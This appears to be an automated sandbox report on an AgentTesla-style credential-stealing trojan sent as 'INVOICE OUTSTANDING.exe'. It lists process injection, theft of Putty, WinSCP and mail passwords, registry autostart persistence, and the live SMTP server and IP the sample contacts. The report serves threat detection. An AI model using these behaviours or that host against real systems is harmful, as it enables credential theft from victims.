            behaviorgraph top1 signatures2 2 Behavior Graph ID: 680571 Sample: INVOICE OUTSTANDING.exe Startdate: 08/08/2022 Architecture: WINDOWS Score: 100 50 Snort IDS alert for network traffic 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 Antivirus detection for dropped file 2->54 56 13 other signatures 2->56 7 INVOICE OUTSTANDING.exe 6 2->7         started        11 kECjS.exe 2 2->11         started        13 kECjS.exe 1 2->13         started        process3 file4 34 C:\Users\user\AppData\Roaming\ahgeNfsrA.exe, PE32 7->34 dropped 36 C:\Users\user\AppData\Local\...\tmp69D2.tmp, XML 7->36 dropped 38 C:\Users\user\...\INVOICE OUTSTANDING.exe.log, ASCII 7->38 dropped 58 Writes to foreign memory regions 7->58 60 Injects a PE file into a foreign processes 7->60 15 RegSvcs.exe 2 4 7->15         started        20 schtasks.exe 1 7->20         started        22 BackgroundTransferHost.exe 13 7->22         started        24 conhost.exe 11->24         started        26 conhost.exe 13->26         started        signatures5 process6 dnsIp7 40 mail.oceanskylogistics.in 43.255.154.57, 49763, 587 AS-26496-GO-DADDY-COM-LLCUS Singapore 15->40 30 C:\Users\user\AppData\Roaming\...\kECjS.exe, PE32 15->30 dropped 32 C:\Windows\System32\drivers\etc\hosts, ASCII 15->32 dropped 42 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 15->42 44 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 15->44 46 Tries to steal Mail credentials (via file / registry access) 15->46 48 5 other signatures 15->48 28 conhost.exe 20->28         started        file8 signatures9 process10

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            INVOICE OUTSTANDING.exe38%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
            INVOICE OUTSTANDING.exe100%AviraHEUR/AGEN.1235476
            INVOICE OUTSTANDING.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\ahgeNfsrA.exe100%AviraHEUR/AGEN.1235476
            C:\Users\user\AppData\Roaming\ahgeNfsrA.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\ahgeNfsrA.exe38%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
            C:\Users\user\AppData\Roaming\kECjS\kECjS.exe0%MetadefenderBrowse
            C:\Users\user\AppData\Roaming\kECjS\kECjS.exe0%ReversingLabs

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            0.0.INVOICE OUTSTANDING.exe.a30000.0.unpack100%AviraHEUR/AGEN.1235476Download File
            14.0.RegSvcs.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

            Domains

            SourceDetectionScannerLabelLink
            mail.oceanskylogistics.in2%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.fontbureau.com.C0%Avira URL Cloudsafe
            http://www.monotype.K0%Avira URL Cloudsafe
            http://wITvjB.com0%Avira URL Cloudsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.fontbureau.comessed0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.carterandcone.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.fontbureau.comalicCC0%Avira URL Cloudsafe
            http://www.fonts.comic0%URL Reputationsafe
            http://www.founder.com.cn/cnl0%URL Reputationsafe
            http://www.fontbureau.comaCC0%Avira URL Cloudsafe
            http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
            http://www.fonts.comn0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.founder.com.cn/cnl-s0%URL Reputationsafe
            http://www.urwpp.de0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            https://Vvf6edm0NHgn8Mct.com0%Avira URL Cloudsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.fontbureau.comueed0%URL Reputationsafe
            http://www.fontbureau.comalsd0%URL Reputationsafe
            http://www.founder.com.cn/cnr-f0%URL Reputationsafe
            http://www.fontbureau.comF0%URL Reputationsafe
            http://www.fontbureau.comcom/pC0%Avira URL Cloudsafe
            http://www.agfamonotype.0%URL Reputationsafe
            http://www.fonts.comn-u0%URL Reputationsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
            http://www.founder.com.cn/cn/cr%X0%Avira URL Cloudsafe
            http://www.tiro.comlic0%URL Reputationsafe
            http://www.sandoll.co.kre0%URL Reputationsafe
            http://www.fontbureau.coma0%URL Reputationsafe
            http://www.fontbureau.come.com0%URL Reputationsafe
            http://www.microft.c0%Avira URL Cloudsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.sajatypeworks.comdif0%Avira URL Cloudsafe
            http://mail.oceanskylogistics.in0%Avira URL Cloudsafe
            http://www.carterandcone.comand0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            mail.oceanskylogistics.in
            		43.255.154.57
            		truetrueunknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://127.0.0.1:HTTP/1.1RegSvcs.exe, 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		low
            http://www.fontbureau.com/designersGINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://www.fontbureau.com/designers/?INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://www.founder.com.cn/cn/bTheINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.fontbureau.com/designers?INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://www.fontbureau.com.CINVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.monotype.KINVOICE OUTSTANDING.exe, 00000000.00000003.274775393.0000000005D9A000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.274864897.0000000005D9A000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://wITvjB.comRegSvcs.exe, 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.tiro.comINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258837182.0000000005DAB000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258983594.0000000005DAB000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258921299.0000000005DAB000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.com/designersINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://www.fontbureau.comessedINVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.goodfont.co.krINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.carterandcone.comINVOICE OUTSTANDING.exe, 00000000.00000003.264428534.0000000005D9D000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.263804833.0000000005D9D000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.264182537.0000000005D9D000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.sajatypeworks.comINVOICE OUTSTANDING.exe, 00000000.00000003.258362405.0000000005DB3000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.257901573.0000000005DB3000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.257875244.0000000005DB2000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258530065.0000000005DB3000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.typography.netDINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.founder.com.cn/cn/cTheINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.galapagosdesign.com/staff/dennis.htmINVOICE OUTSTANDING.exe, 00000000.00000003.274775393.0000000005D9A000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.273884816.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.274864897.0000000005D9A000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.274960497.0000000005D9A000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.275003587.0000000005D9A000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://fontfabrik.comINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.comalicCCINVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.fonts.comicINVOICE OUTSTANDING.exe, 00000000.00000003.258155841.0000000005DAB000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.founder.com.cn/cnlINVOICE OUTSTANDING.exe, 00000000.00000003.261791694.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261227330.0000000005D94000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261899825.0000000005D9B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.comaCCINVOICE OUTSTANDING.exe, 00000000.00000003.322102237.0000000005D90000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.347616586.0000000005D9A000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://DynDns.comDynDNSnamejidpasswordPsi/PsiRegSvcs.exe, 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fonts.comnINVOICE OUTSTANDING.exe, 00000000.00000003.258239730.0000000005DAB000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.galapagosdesign.com/DPleaseINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fonts.comINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258250097.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258179215.0000000005DB4000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.sandoll.co.krINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.260100666.0000000005D99000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.urwpp.deDPleaseINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.founder.com.cn/cnl-sINVOICE OUTSTANDING.exe, 00000000.00000003.261182333.0000000005DCD000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.urwpp.deINVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.zhongyicts.com.cnINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://Vvf6edm0NHgn8Mct.comRegSvcs.exe, 0000000E.00000002.545492635.000000000386C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameINVOICE OUTSTANDING.exe, 00000000.00000002.334218566.0000000002E75000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.sakkal.comINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.comueedINVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.comalsdINVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.founder.com.cn/cnr-fINVOICE OUTSTANDING.exe, 00000000.00000003.261182333.0000000005DCD000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.apache.org/licenses/LICENSE-2.0INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.fontbureau.comINVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268522512.0000000005D9A000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.fontbureau.comFINVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268522512.0000000005D9A000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.comcom/pCINVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.agfamonotype.INVOICE OUTSTANDING.exe, 00000000.00000003.275083576.0000000005DA4000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fonts.comn-uINVOICE OUTSTANDING.exe, 00000000.00000003.258250097.0000000005DB4000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwRegSvcs.exe, 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.founder.com.cn/cn/cr%XINVOICE OUTSTANDING.exe, 00000000.00000003.261782172.0000000005D94000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.tiro.comlicINVOICE OUTSTANDING.exe, 00000000.00000003.258837182.0000000005DAB000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.sandoll.co.kreINVOICE OUTSTANDING.exe, 00000000.00000003.260100666.0000000005D99000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.comaINVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.come.comINVOICE OUTSTANDING.exe, 00000000.00000003.322102237.0000000005D90000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.347616586.0000000005D9A000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.microft.cRegSvcs.exe, 0000000E.00000003.362147300.00000000067C1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.carterandcone.comlINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers/cabarga.htmlMINVOICE OUTSTANDING.exe, 00000000.00000003.268670914.0000000005DCD000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.fontbureau.com/designers/cabarga.htmlNINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.founder.com.cn/cnINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261791694.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261227330.0000000005D94000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261899825.0000000005D9B000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261182333.0000000005DCD000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers/frere-jones.htmlINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.fontbureau.com/designers/cabarga.htmlINVOICE OUTSTANDING.exe, 00000000.00000003.268824829.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268851153.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268670914.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268730021.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268758763.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268943050.0000000005DCD000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.fontbureau.com/pCINVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.267043053.0000000005D98000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268522512.0000000005D9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.jiyu-kobo.co.jp/INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers8INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.sajatypeworks.comdifINVOICE OUTSTANDING.exe, 00000000.00000003.257901573.0000000005DB3000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258048117.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.257978730.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258250097.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.257944160.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258298723.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258070392.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.257875244.0000000005DB2000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258179215.0000000005DB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://mail.oceanskylogistics.inRegSvcs.exe, 0000000E.00000002.545492635.000000000386C000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.carterandcone.comandINVOICE OUTSTANDING.exe, 00000000.00000003.264428534.0000000005D9D000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.263804833.0000000005D9D000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.264182537.0000000005D9D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        43.255.154.57
                                        		mail.oceanskylogistics.inSingapore
                                        		26496AS-26496-GO-DADDY-COM-LLCUStrue

                                        General Information

                                        Joe Sandbox Version:35.0.0 Citrine
                                        Analysis ID:680571
                                        Start date and time: 08/08/202220:18:102022-08-08 20:18:10 +02:00
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 8m 30s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Sample file name:INVOICE OUTSTANDING.exe
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:30
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.adwa.spyw.evad.winEXE@11/8@1/1
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HDC Information:Failed
                                        HCA Information:
                                        • Successful, ratio: 97%
                                        • Number of executed functions: 105
                                        • Number of non-executed functions: 23
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Adjust boot time
                                        • Enable AMSI

                                        Warnings

                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                        • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        20:20:23API Interceptor1x Sleep call for process: INVOICE OUTSTANDING.exe modified
                                        20:20:50API Interceptor541x Sleep call for process: RegSvcs.exe modified
                                        20:20:54AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run kECjS C:\Users\user\AppData\Roaming\kECjS\kECjS.exe
                                        20:21:02AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run kECjS C:\Users\user\AppData\Roaming\kECjS\kECjS.exe

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        43.255.154.57UPDATED SOA.exeGet hashmaliciousBrowse
                                          QUOTATION REQUEST.exeGet hashmaliciousBrowse
                                            BANK DETAILS.exeGet hashmaliciousBrowse
                                              FREIGHT PAYMENT CONFIRMATION.exeGet hashmaliciousBrowse
                                                BANK DETAILS.exeGet hashmaliciousBrowse
                                                  ExW7tuqH3zxNcwp.exeGet hashmaliciousBrowse
                                                    BANK DETAILS.exeGet hashmaliciousBrowse
                                                      PROFOMA INVOICE.exeGet hashmaliciousBrowse
                                                        HT97832022017.exeGet hashmaliciousBrowse
                                                          PURCHASE ORDER # 12076030 & 12076022.exeGet hashmaliciousBrowse
                                                            SOA.exeGet hashmaliciousBrowse
                                                              SWIFT COPY.exeGet hashmaliciousBrowse
                                                                BANK DETAILS.exeGet hashmaliciousBrowse
                                                                  UPDATED SOA.exeGet hashmaliciousBrowse
                                                                    TT COPY.exeGet hashmaliciousBrowse
                                                                      REVISED BL.exeGet hashmaliciousBrowse
                                                                        APRIL SOA PAYMENTS.exeGet hashmaliciousBrowse
                                                                          Invoice and account details.exeGet hashmaliciousBrowse
                                                                            f8keZ8QG3Lw4Vvy.exeGet hashmaliciousBrowse
                                                                              INVOICE.1.exeGet hashmaliciousBrowse

                                                                                Domains

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                mail.oceanskylogistics.inUPDATED SOA.exeGet hashmaliciousBrowse
                                                                                • 43.255.154.57
                                                                                QUOTATION REQUEST.exeGet hashmaliciousBrowse
                                                                                • 43.255.154.57
                                                                                BANK DETAILS.exeGet hashmaliciousBrowse
                                                                                • 43.255.154.57
                                                                                FREIGHT PAYMENT CONFIRMATION.exeGet hashmaliciousBrowse
                                                                                • 43.255.154.57
                                                                                BANK DETAILS.exeGet hashmaliciousBrowse
                                                                                • 43.255.154.57
                                                                                ExW7tuqH3zxNcwp.exeGet hashmaliciousBrowse
                                                                                • 43.255.154.57
                                                                                BANK DETAILS.exeGet hashmaliciousBrowse
                                                                                • 43.255.154.57
                                                                                PROFOMA INVOICE.exeGet hashmaliciousBrowse
                                                                                • 43.255.154.57
                                                                                HT97832022017.exeGet hashmaliciousBrowse
                                                                                • 43.255.154.57
                                                                                PURCHASE ORDER # 12076030 & 12076022.exeGet hashmaliciousBrowse
                                                                                • 43.255.154.57
                                                                                SOA.exeGet hashmaliciousBrowse
                                                                                • 43.255.154.57
                                                                                SWIFT COPY.exeGet hashmaliciousBrowse
                                                                                • 43.255.154.57
                                                                                BANK DETAILS.exeGet hashmaliciousBrowse
                                                                                • 43.255.154.57
                                                                                UPDATED SOA.exeGet hashmaliciousBrowse
                                                                                • 43.255.154.57
                                                                                TT COPY.exeGet hashmaliciousBrowse
                                                                                • 43.255.154.57
                                                                                REVISED BL.exeGet hashmaliciousBrowse
                                                                                • 43.255.154.57
                                                                                APRIL SOA PAYMENTS.exeGet hashmaliciousBrowse
                                                                                • 43.255.154.57
                                                                                Invoice and account details.exeGet hashmaliciousBrowse
                                                                                • 43.255.154.57
                                                                                f8keZ8QG3Lw4Vvy.exeGet hashmaliciousBrowse
                                                                                • 43.255.154.57
                                                                                INVOICE.1.exeGet hashmaliciousBrowse
                                                                                • 43.255.154.57

                                                                                ASNs

